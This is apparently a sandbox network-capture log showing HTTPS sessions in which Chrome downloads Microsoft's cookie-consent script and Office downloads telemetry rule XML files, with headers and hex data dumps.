                                                                                                                                                                      Host: wcpstatic.microsoft.com
                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                      Accept: */*
                                                                                                                                                                      Sec-Fetch-Site: same-site
                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                                                                      Referer: https://learn.microsoft.com/
                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                      2024-11-21 05:23:58 UTC713INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:23:58 GMT
                                                                                                                                                                      Content-Type: application/javascript
                                                                                                                                                                      Content-Length: 52717
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                      Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                      Age: 37104
                                                                                                                                                                      Cache-Control: max-age=43200
                                                                                                                                                                      Content-MD5: QT/MdZzBmCG2G2lBgIsptQ==
                                                                                                                                                                      Etag: 0x8DA85F6F74C6D08
                                                                                                                                                                      Last-Modified: Wed, 24 Aug 2022 17:34:58 GMT
                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                      X-Cache: CONFIG_NOCACHE
                                                                                                                                                                      x-ms-blob-type: BlockBlob
                                                                                                                                                                      x-ms-lease-status: unlocked
                                                                                                                                                                      x-ms-request-id: 1f729e99-f01e-00b6-687f-3b5f37000000
                                                                                                                                                                      x-ms-version: 2009-09-19
                                                                                                                                                                      x-azure-ref: 20241121T052358Z-1777c6cb754xrr98hC1TEB3kag0000000af000000000ands
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      2024-11-21 05:23:58 UTC15671INData Raw: 76 61 72 20 57 63 70 43 6f 6e 73 65 6e 74 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 7b 32 32 39 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 77 69 6e 64 6f 77 2c 65 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 6f 28 6e 29 7b 69 66 28 74 5b 6e 5d 29 72 65 74 75 72 6e 20 74 5b 6e 5d 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 72 3d 74 5b 6e 5d 3d 7b 69 3a 6e 2c 6c 3a 21 31 2c 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 72 65 74 75 72 6e 20 65 5b 6e 5d 2e 63 61 6c 6c 28 72 2e 65 78 70 6f 72 74 73 2c 72 2c 72 2e 65 78 70 6f 72 74 73 2c 6f 29 2c 72 2e 6c 3d 21 30 2c 72 2e 65 78 70 6f 72 74 73 7d 72 65 74 75 72 6e 20 6f 2e 6d 3d 65 2c 6f 2e 63 3d 74 2c 6f 2e 64 3d 66 75 6e 63 74 69 6f 6e 28 65
                                                                                                                                                                      Data Ascii: var WcpConsent;!function(){var e={229:function(e){window,e.exports=function(e){var t={};function o(n){if(t[n])return t[n].exports;var r=t[n]={i:n,l:!1,exports:{}};return e[n].call(r.exports,r,r.exports,o),r.l=!0,r.exports}return o.m=e,o.c=t,o.d=function(e
                                                                                                                                                                      2024-11-21 05:23:58 UTC16384INData Raw: 29 7b 72 65 74 75 72 6e 20 65 3f 65 2e 72 65 70 6c 61 63 65 28 2f 26 2f 67 2c 22 26 61 6d 70 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 3c 2f 67 2c 22 26 6c 74 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 3e 2f 67 2c 22 26 67 74 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 22 2f 67 2c 22 26 71 75 6f 74 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 27 2f 67 2c 22 26 23 30 33 39 3b 22 29 3a 22 22 7d 2c 65 7d 28 29 2c 61 3d 6e 2e 6c 6f 63 61 6c 73 2c 6c 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 65 2c 74 2c 6f 2c 6e 2c 72 2c 69 2c 61 29 7b 74 68 69 73 2e 64 69 72 65 63 74 69 6f 6e 3d 22 6c 74 72 22 2c 74 68 69 73 2e 70 72 65 76 69 6f 75 73 46 6f 63 75 73 45 6c 65 6d 65 6e 74 42 65 66 6f 72 65 50 6f 70 75 70 3d 6e 75 6c 6c 2c 74 68 69 73 2e 63 6f 6f 6b 69
                                                                                                                                                                      Data Ascii: ){return e?e.replace(/&/g,"&amp;").replace(/</g,"&lt;").replace(/>/g,"&gt;").replace(/"/g,"&quot;").replace(/'/g,"&#039;"):""},e}(),a=n.locals,l=function(){function e(e,t,o,n,r,i,a){this.direction="ltr",this.previousFocusElementBeforePopup=null,this.cooki
                                                                                                                                                                      2024-11-21 05:23:58 UTC711INData Raw: 6f 72 22 5d 2b 22 20 21 69 6d 70 6f 72 74 61 6e 74 3b 5c 6e 20 20 20 20 20 20 20 20 7d 22 2c 74 2b 3d 27 69 6e 70 75 74 5b 74 79 70 65 3d 22 72 61 64 69 6f 22 5d 2e 27 2b 63 2e 63 6f 6f 6b 69 65 49 74 65 6d 52 61 64 69 6f 42 74 6e 2b 22 20 2b 20 6c 61 62 65 6c 3a 68 6f 76 65 72 3a 3a 61 66 74 65 72 20 7b 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 22 2b 65 5b 22 72 61 64 69 6f 2d 62 75 74 74 6f 6e 2d 68 6f 76 65 72 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 22 5d 2b 22 20 21 69 6d 70 6f 72 74 61 6e 74 3b 5c 6e 20 20 20 20 20 20 20 20 7d 22 2c 74 2b 3d 27 69 6e 70 75 74 5b 74 79 70 65 3d 22 72 61 64 69 6f 22 5d 2e 27 2b 63 2e 63 6f 6f 6b 69 65 49 74 65 6d 52 61 64 69 6f 42 74 6e 2b 22 20 2b 20 6c
                                                                                                                                                                      Data Ascii: or"]+" !important;\n }",t+='input[type="radio"].'+c.cookieItemRadioBtn+" + label:hover::after {\n background-color: "+e["radio-button-hover-background-color"]+" !important;\n }",t+='input[type="radio"].'+c.cookieItemRadioBtn+" + l
                                                                                                                                                                      2024-11-21 05:23:59 UTC16384INData Raw: 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 22 2b 65 5b 22 72 61 64 69 6f 2d 62 75 74 74 6f 6e 2d 64 69 73 61 62 6c 65 64 2d 63 6f 6c 6f 72 22 5d 2b 22 20 21 69 6d 70 6f 72 74 61 6e 74 3b 5c 6e 20 20 20 20 20 20 20 20 7d 22 7d 2c 65 7d 28 29 2c 64 3d 5b 22 61 72 22 2c 22 68 65 22 2c 22 70 73 22 2c 22 75 72 22 2c 22 66 61 22 2c 22 70 61 22 2c 22 73 64 22 2c 22 74 6b 22 2c 22 75 67 22 2c 22 79 69 22 2c 22 73 79 72 22 2c 22 6b 73 2d 61 72 61 62 22 5d 2c 75 3d 7b 22 63 6c 6f 73 65 2d 62 75 74 74 6f 6e 2d 63 6f 6c 6f 72 22 3a 22 23 36 36 36 36 36 36 22 2c 22 73 65 63 6f 6e 64 61 72 79 2d 62 75 74 74 6f 6e 2d 64 69 73 61 62 6c 65 64 2d 6f 70 61 63 69 74 79 22 3a 22 31 22 2c 22 73 65 63 6f 6e 64 61 72 79 2d 62 75 74 74 6f
                                                                                                                                                                      Data Ascii: background-color: "+e["radio-button-disabled-color"]+" !important;\n }"},e}(),d=["ar","he","ps","ur","fa","pa","sd","tk","ug","yi","syr","ks-arab"],u={"close-button-color":"#666666","secondary-button-disabled-opacity":"1","secondary-butto
                                                                                                                                                                      2024-11-21 05:23:59 UTC3567INData Raw: 28 22 2d 22 29 5b 30 5d 3b 6f 3d 65 2e 73 70 6c 69 74 28 22 2d 22 29 5b 30 5d 3d 3d 3d 6e 7d 72 65 74 75 72 6e 20 6f 7d 28 65 2c 63 29 7d 29 29 3b 73 26 26 30 3d 3d 3d 73 2e 6c 65 6e 67 74 68 26 26 28 65 3d 22 65 6e 2d 55 53 22 29 2c 6f 2e 70 6c 61 63 65 68 6f 6c 64 65 72 45 6c 65 6d 65 6e 74 3d 6c 2c 72 26 26 6f 2e 63 6f 6e 73 65 6e 74 43 68 61 6e 67 65 64 43 61 6c 6c 62 61 63 6b 73 2e 72 65 67 69 73 74 65 72 43 61 6c 6c 62 61 63 6b 28 72 29 2c 6f 2e 73 61 76 65 43 6f 6f 6b 69 65 28 29 2c 6f 2e 73 69 74 65 43 6f 6e 73 65 6e 74 3d 6e 65 77 20 66 28 21 31 29 2c 6e 75 6c 6c 3d 3d 6e 7c 7c 6e 28 76 6f 69 64 20 30 2c 6f 2e 73 69 74 65 43 6f 6e 73 65 6e 74 29 2c 6f 2e 69 73 49 6e 69 74 52 65 61 64 79 3d 21 30 2c 74 68 69 73 2e 63 6f 6e 73 65 6e 74 43 68 61 6e
                                                                                                                                                                      Data Ascii: ("-")[0];o=e.split("-")[0]===n}return o}(e,c)}));s&&0===s.length&&(e="en-US"),o.placeholderElement=l,r&&o.consentChangedCallbacks.registerCallback(r),o.saveCookie(),o.siteConsent=new f(!1),null==n||n(void 0,o.siteConsent),o.isInitReady=!0,this.consentChan


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                      102192.168.2.64983213.107.246.45443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:23:59 UTC192OUTGET /rules/rule702351v1s19.xml HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                      2024-11-21 05:24:00 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:24:00 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 1395
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                                      ETag: "0x8DC582BE017CAD3"
                                                                                                                                                                      x-ms-request-id: 43ee33d3-701e-0021-1e9c-3b3d45000000
                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                      x-azure-ref: 20241121T052400Z-r1d97b99577n5jhbhC1TEB74vn00000009yg000000003da4
                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      2024-11-21 05:24:00 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63
                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoic


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                      103192.168.2.64983313.107.246.45443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:24:00 UTC192OUTGET /rules/rule702350v1s19.xml HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                      2024-11-21 05:24:00 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:24:00 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 1358
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                                                                                                                                                                      ETag: "0x8DC582BE6431446"
                                                                                                                                                                      x-ms-request-id: 3a8ea751-101e-007a-417b-3b047e000000
                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                      x-azure-ref: 20241121T052400Z-178bfbc474btrnf9hC1NYCb80g000000014000000000h1q7
                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      2024-11-21 05:24:00 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoice" S="Medium" /> <F T="2">


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                      104192.168.2.64983413.107.246.45443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:24:00 UTC192OUTGET /rules/rule701251v1s19.xml HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                      2024-11-21 05:24:00 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:24:00 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 1395
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
                                                                                                                                                                      ETag: "0x8DC582BDE12A98D"
                                                                                                                                                                      x-ms-request-id: 9e236b6e-d01e-0049-16a6-3be7dc000000
                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                      x-azure-ref: 20241121T052400Z-r1d97b99577gg97qhC1TEBcrf400000009v0000000001rks
                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      2024-11-21 05:24:00 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69
                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701251" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisi


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                      105192.168.2.64983513.107.246.45443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:24:00 UTC192OUTGET /rules/rule701250v1s19.xml HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                      2024-11-21 05:24:00 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:24:00 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 1358
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                                      ETag: "0x8DC582BE022ECC5"
                                                                                                                                                                      x-ms-request-id: fa1269cf-b01e-003d-7592-3bd32c000000
                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                      x-azure-ref: 20241121T052400Z-r1d97b99577ndm4rhC1TEBf0ps0000000a4g0000000007sz
                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      2024-11-21 05:24:00 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69 6f 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701250" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisio" S="Medium" /> <F T="2">


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                      106192.168.2.64983613.107.246.45443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:24:00 UTC192OUTGET /rules/rule700051v1s19.xml HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                      2024-11-21 05:24:00 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:24:00 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 1389
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                      ETag: "0x8DC582BE10A6BC1"
                                                                                                                                                                      x-ms-request-id: 46934538-601e-0050-507b-3b2c9c000000
                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                      x-azure-ref: 20241121T052400Z-178bfbc474bbcwv4hC1NYCypys00000000w000000000b7pc
                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      2024-11-21 05:24:00 UTC1389INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22
                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                      107192.168.2.64983813.107.246.454432120C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:24:01 UTC373OUTGET /mscc/lib/v2/wcp-consent.js HTTP/1.1
                                                                                                                                                                      Host: wcpstatic.microsoft.com
                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                      Accept: */*
                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                      2024-11-21 05:24:01 UTC713INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:24:01 GMT
                                                                                                                                                                      Content-Type: application/javascript
                                                                                                                                                                      Content-Length: 52717
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                      Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                      Age: 37107
                                                                                                                                                                      Cache-Control: max-age=43200
                                                                                                                                                                      Content-MD5: QT/MdZzBmCG2G2lBgIsptQ==
                                                                                                                                                                      Etag: 0x8DA85F6F74C6D08
                                                                                                                                                                      Last-Modified: Wed, 24 Aug 2022 17:34:58 GMT
                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                      X-Cache: CONFIG_NOCACHE
                                                                                                                                                                      x-ms-blob-type: BlockBlob
                                                                                                                                                                      x-ms-lease-status: unlocked
                                                                                                                                                                      x-ms-request-id: 1f729e99-f01e-00b6-687f-3b5f37000000
                                                                                                                                                                      x-ms-version: 2009-09-19
                                                                                                                                                                      x-azure-ref: 20241121T052401Z-178bfbc474bwh9gmhC1NYCy3rs000000012000000000evd8
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      2024-11-21 05:24:01 UTC15671INData Raw: 76 61 72 20 57 63 70 43 6f 6e 73 65 6e 74 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 7b 32 32 39 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 77 69 6e 64 6f 77 2c 65 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 6f 28 6e 29 7b 69 66 28 74 5b 6e 5d 29 72 65 74 75 72 6e 20 74 5b 6e 5d 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 72 3d 74 5b 6e 5d 3d 7b 69 3a 6e 2c 6c 3a 21 31 2c 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 72 65 74 75 72 6e 20 65 5b 6e 5d 2e 63 61 6c 6c 28 72 2e 65 78 70 6f 72 74 73 2c 72 2c 72 2e 65 78 70 6f 72 74 73 2c 6f 29 2c 72 2e 6c 3d 21 30 2c 72 2e 65 78 70 6f 72 74 73 7d 72 65 74 75 72 6e 20 6f 2e 6d 3d 65 2c 6f 2e 63 3d 74 2c 6f 2e 64 3d 66 75 6e 63 74 69 6f 6e 28 65
                                                                                                                                                                      Data Ascii: var WcpConsent;!function(){var e={229:function(e){window,e.exports=function(e){var t={};function o(n){if(t[n])return t[n].exports;var r=t[n]={i:n,l:!1,exports:{}};return e[n].call(r.exports,r,r.exports,o),r.l=!0,r.exports}return o.m=e,o.c=t,o.d=function(e
